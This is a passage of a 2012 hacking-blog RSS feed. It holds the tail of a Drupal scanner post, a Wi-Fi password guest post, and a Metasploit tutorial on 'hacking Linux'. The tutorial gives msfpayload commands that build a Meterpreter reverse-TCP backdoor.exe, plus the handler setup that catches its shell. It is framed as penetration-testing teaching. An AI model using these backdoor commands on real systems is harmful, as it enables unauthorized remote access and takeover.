small;"&gt;jquery_update &lt;/span&gt;&lt;/div&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;root@bt:~/Desktop#  &lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="font-family: inherit;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-jTcWCeVW8Sw/T0DAcwrJ21I/AAAAAAAABBw/XLUCRnKV3Ec/s1600/dpscan.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="230" src="http://3.bp.blogspot.com/-jTcWCeVW8Sw/T0DAcwrJ21I/AAAAAAAABBw/XLUCRnKV3Ec/s400/dpscan.jpg" width="450" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="font-family: inherit; text-align: left;" trbidi="on"&gt;&lt;span class="st_twitter_large" displaytext="Tweet" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_facebook_large" displaytext="Facebook" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_ybuzz_large" displaytext="Yahoo! Buzz" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_gbuzz_large" displaytext="Google Buzz" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_email_large" displaytext="Email" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_sharethis_large" displaytext="ShareThis" style="font-size: small;"&gt;&lt;/span&gt;   &lt;br /&gt;
&lt;div&gt;&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;&lt;b&gt;RSS feed&lt;/b&gt;&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;&lt;b&gt;Facebook fan&lt;/b&gt;&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-6716341360102715193?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=4vUjDOhXL6k:tBl6uZ8UKF0:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=4vUjDOhXL6k:tBl6uZ8UKF0:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=4vUjDOhXL6k:tBl6uZ8UKF0:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=4vUjDOhXL6k:tBl6uZ8UKF0:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=4vUjDOhXL6k:tBl6uZ8UKF0:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=4vUjDOhXL6k:tBl6uZ8UKF0:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=4vUjDOhXL6k:tBl6uZ8UKF0:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=4vUjDOhXL6k:tBl6uZ8UKF0:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=4vUjDOhXL6k:tBl6uZ8UKF0:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=4vUjDOhXL6k:tBl6uZ8UKF0:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=4vUjDOhXL6k:tBl6uZ8UKF0:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=4vUjDOhXL6k:tBl6uZ8UKF0:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=4vUjDOhXL6k:tBl6uZ8UKF0:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/4vUjDOhXL6k" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/4vUjDOhXL6k/dpscan-drupal-security-scanner-tutorial.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-8148WiCQP7g/T0DAfG6R2wI/AAAAAAAABB4/tMpgFh7-7vw/s72-c/drupal.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/02/dpscan-drupal-security-scanner-tutorial.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-1435456721397011774</guid><pubDate>Sun, 19 Feb 2012 07:15:00 +0000</pubDate><atom:updated>2012-02-18T23:16:28.006-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorial</category><category domain="http://www.blogger.com/atom/ns#">EH Security</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">Windows</category><category domain="http://www.blogger.com/atom/ns#">Vulnerability</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Metasploit</category><category domain="http://www.blogger.com/atom/ns#">Exploit</category><category domain="http://www.blogger.com/atom/ns#">Ubuntu</category><title>How to Hack Linux -Metasploit Tutorial Backtrack 5 R1</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/iKTB5W-0R1IZwHYJySv5uOsy2cA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/iKTB5W-0R1IZwHYJySv5uOsy2cA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/iKTB5W-0R1IZwHYJySv5uOsy2cA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/iKTB5W-0R1IZwHYJySv5uOsy2cA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="font-family: inherit;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.ehacking.net/2012/02/how-to-hack-linux-metasploit-tutorial.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="180" src="http://2.bp.blogspot.com/-MSgJhtzbjhE/T0Cg7OB4tSI/AAAAAAAABBQ/OUJES_HDGMw/s320/metasploit.jpg" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span id="goog_2008223640"&gt;&lt;/span&gt;&lt;span id="goog_2008223641"&gt;&lt;/span&gt;Metasploit is a wonderful tool for penetration testing that contain a database of publicly known exploits for various operating system and software's, we have discussed how to hack windows via metasploit on backtrack Linux but how to hack Linux (&lt;a href="http://www.ehacking.net/search/label/Ubuntu" style="color: blue;"&gt;Ubuntu&lt;/a&gt; and any other Linux) via metasploit. &lt;a href="http://www.ehacking.net/search/label/Metasploit" style="color: blue;" target=""&gt;Metasploit&lt;/a&gt; contain several exploits for Linux operating system too but we can windows exploit for Linux.  This is the video tutorial in which I will show you how to hack a Linux operating system because in the penetration testing sometimes we need to get the root access on the server or computer.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;This video let you know about the weaknesses of wine (an application to run windows executable on &lt;a href="http://www.ehacking.net/search/label/Linux" style="color: blue;"&gt;Linux&lt;/a&gt;), yes an attacker take advantage of wine to execute their windows backdoor on Linux machine to get the full access on the computer.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;iframe allowfullscreen="" frameborder="0" height="400" src="http://www.youtube.com/embed/CxwmExVFJH0" width="550"&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;blockquote class="tr_bq"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;root@bt:~# msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.12 lport=4444 X &amp;gt; backdoor.exe&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Created by msfpayload (http://www.metasploit.com).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Payload: windows/meterpreter/reverse_tcp&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;&amp;nbsp;Length: 290&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;Options: {"lhost"=&amp;gt;"192.168.1.12", "lport"=&amp;gt;"4444"}&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Metasploit commands&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;msf &amp;gt; use multi/handler&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;msf&amp;nbsp; exploit(handler) &amp;gt; set payload windows/meterpreter/reverse_tcp&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;payload =&amp;gt; windows/meterpreter/reverse_tcp&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;msf&amp;nbsp; exploit(handler) &amp;gt; set lhost 192.168.1.12&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;lhost =&amp;gt; 192.168.1.12&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;msf&amp;nbsp; exploit(handler) &amp;gt; set lport 4444&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;lport =&amp;gt; 4444&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;msf&amp;nbsp; exploit(handler) &amp;gt; exploit&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;[*] Started reverse handler on 192.168.1.12:4444 &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;[*] Starting the payload handler...&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="font-family: inherit; text-align: left;" trbidi="on"&gt;&lt;span class="st_twitter_large" displaytext="Tweet" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_facebook_large" displaytext="Facebook" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_ybuzz_large" displaytext="Yahoo! Buzz" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_gbuzz_large" displaytext="Google Buzz" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_email_large" displaytext="Email" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_sharethis_large" displaytext="ShareThis" style="font-size: small;"&gt;&lt;/span&gt;   &lt;br /&gt;
&lt;div&gt;&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;&lt;b&gt;RSS feed&lt;/b&gt;&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;&lt;b&gt;Facebook fan&lt;/b&gt;&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-1435456721397011774?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=kWZULGwt_M4:toe0Fqvq_Io:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=kWZULGwt_M4:toe0Fqvq_Io:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=kWZULGwt_M4:toe0Fqvq_Io:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=kWZULGwt_M4:toe0Fqvq_Io:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=kWZULGwt_M4:toe0Fqvq_Io:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=kWZULGwt_M4:toe0Fqvq_Io:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=kWZULGwt_M4:toe0Fqvq_Io:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=kWZULGwt_M4:toe0Fqvq_Io:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=kWZULGwt_M4:toe0Fqvq_Io:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=kWZULGwt_M4:toe0Fqvq_Io:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=kWZULGwt_M4:toe0Fqvq_Io:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=kWZULGwt_M4:toe0Fqvq_Io:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=kWZULGwt_M4:toe0Fqvq_Io:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/kWZULGwt_M4" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/kWZULGwt_M4/how-to-hack-linux-metasploit-tutorial.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-MSgJhtzbjhE/T0Cg7OB4tSI/AAAAAAAABBQ/OUJES_HDGMw/s72-c/metasploit.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/02/how-to-hack-linux-metasploit-tutorial.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-3860309880510777934</guid><pubDate>Wed, 15 Feb 2012 15:55:00 +0000</pubDate><atom:updated>2012-02-15T07:55:08.417-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Review</category><category domain="http://www.blogger.com/atom/ns#">Wireless</category><category domain="http://www.blogger.com/atom/ns#">EH Tips</category><category domain="http://www.blogger.com/atom/ns#">Guest Post</category><title>Protecting Your Wifi-Connections - ISPs are not Your Mothers</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/-GafuolCpjK8Fs085dG0rbH5-Bw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/-GafuolCpjK8Fs085dG0rbH5-Bw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/-GafuolCpjK8Fs085dG0rbH5-Bw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/-GafuolCpjK8Fs085dG0rbH5-Bw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="font-family: inherit;"&gt;          &lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;div style="margin-bottom: 0.2in;"&gt;          &lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;div style="margin-bottom: 0.2in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;&lt;span style="text-decoration: none;"&gt;&lt;span style="font-style: normal;"&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt;If you have recently got a new &lt;a href="http://www.ehacking.net/search/label/Wireless" style="color: blue;" target="_blank"&gt;Wi-Fi&lt;/a&gt; connection then you will need to know the best ways to protect it. The problem with Wi-Fi is the fact that, as it is ranged, anyone can connect to it if you leave it unprotected. &lt;br /&gt;
&lt;br /&gt;
Most routers will come equipped with a password; however you need to make sure if yours is activated, as there are many problems associated with routers that don’t. If you are unsure of how to go about doing this, it is usually a fairly simple process – websites such as Broadband Expert will show you how best to do it, so it is good to look there.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-family: inherit; margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://1.bp.blogspot.com/-k1pTzVncDY8/TzvTDWmsuLI/AAAAAAAABBA/-WGQ9qzGGuE/s1600/2353464142_3ac72427ce.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="222" src="http://1.bp.blogspot.com/-k1pTzVncDY8/TzvTDWmsuLI/AAAAAAAABBA/-WGQ9qzGGuE/s400/2353464142_3ac72427ce.jpg" width="400" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;          &lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  A:link { so-language: zxx }
 --&gt;
 
&lt;/style&gt;  &lt;div align="CENTER" style="margin-bottom: 0in;"&gt;&lt;span style="color: black; font-size: small;"&gt;&lt;span style="text-decoration: none;"&gt;&lt;i&gt;&lt;b&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt;(Courtesy of &lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://www.flickr.com/photos/netweb/2353464142/sizes/m/in/photostream/" target="_blank"&gt;StephenEdgar - Netweb&lt;/a&gt;&lt;/span&gt;&lt;span style="color: black; font-size: small;"&gt;&lt;span style="text-decoration: none;"&gt;&lt;i&gt;&lt;b&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt;)&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: inherit;"&gt;          &lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;&lt;span style="text-decoration: none;"&gt;&lt;span style="font-style: normal;"&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt;Unfortunately there are a lot of people who, even though they are aware of the risks, do not protect their Wi-Fi with a password, even though this is incredibly easy to do. They do not seem to realize just how serious it can be without a password, as many people will attempt to gain access to any internet connection that is not protected with tools given by the internet provider.&lt;br /&gt;
&lt;br /&gt;
The thing is, any connection to the internet is easily located to you – when browsing it is possible to trace it back to you should anything illegal occur. And unfortunately, in the past it has been the case where people have hijacked the internet connection of other people and used it for illegal purposes, causing some people to lose their internet connection while it was sorted out, causing problems for them in the future as well.&lt;br /&gt;
&lt;br /&gt;
At times it can also be possible that people will visit malicious sites or will be able to affect the overall integrity of your computer system, causing a lot of problems for you and any hardware you use to connect with the internet connection. Luckily it is really easy to protect yourself against this kind of thing, but you need to make sure that you do have passwords activated.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-family: inherit; margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://1.bp.blogspot.com/-1tU512bjNuc/TzvTEyf6M3I/AAAAAAAABBI/4UeqUP_5l2Q/s1600/2989956079_a3af0c4de6_z.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="300" src="http://1.bp.blogspot.com/-1tU512bjNuc/TzvTEyf6M3I/AAAAAAAABBI/4UeqUP_5l2Q/s400/2989956079_a3af0c4de6_z.jpg" width="400" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;          &lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  A:link { so-language: zxx }
 --&gt;
 
&lt;/style&gt;  &lt;div align="CENTER" style="margin-bottom: 0in;"&gt;&lt;span style="color: black; font-size: small;"&gt;&lt;span style="text-decoration: none;"&gt;&lt;i&gt;&lt;b&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt;(Courtesy of &lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://www.flickr.com/photos/goodrob13/2989956079/sizes/z/in/photostream/" target="_blank"&gt;&lt;span style="color: blue;"&gt;&lt;i&gt;&lt;u&gt;&lt;b&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt;goodrob13&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style="color: black; font-size: small;"&gt;&lt;span style="text-decoration: none;"&gt;&lt;i&gt;&lt;b&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt;)&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="font-family: inherit;"&gt;          &lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  A:link { so-language: zxx }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;span style="color: black; font-size: small;"&gt;&lt;span style="text-decoration: none;"&gt;&lt;span style="font-style: normal;"&gt;&lt;b&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt;&lt;br /&gt;
The reason why you may not have known about the overall importance of protecting your internet connection is due to the fact that it is not the job of the internet provider to tell you about this. It is up to you to ensure that you Wi-Fi connection is secure, and you must take the steps to do this, although sometimes internet providers will give you extra tips and tools for remaining safe when using wireless.&lt;br /&gt;
&lt;br /&gt;
You can also look for help on Broadband Expert, which has many blog posts on how to best protect yourself from these kinds of crimes, ensuring that you remain safe while online. You can also compare different broadband connections locally, so you can get the best and safest deal for you.&lt;br /&gt;
&lt;br /&gt;
In the end it is up to you to ensure that your connection is safe. As said, many routers will provide some form of connection as default, but you need to make sure of this, and if not you may want to add some extra layers on top, just so that you know you are the only one using it.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After all, if you are limited on your data usage per month then you will not want anyone else using it, as it could cost you a lot in extra fees for internet data which you didn’t use, meaning it is of the utmost importance to keep your internet connection safe and secure, so that only you, the rightful owner of the connection, can use it every day. This is the only way to keep it entirely safe, and it is advised that you do this.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
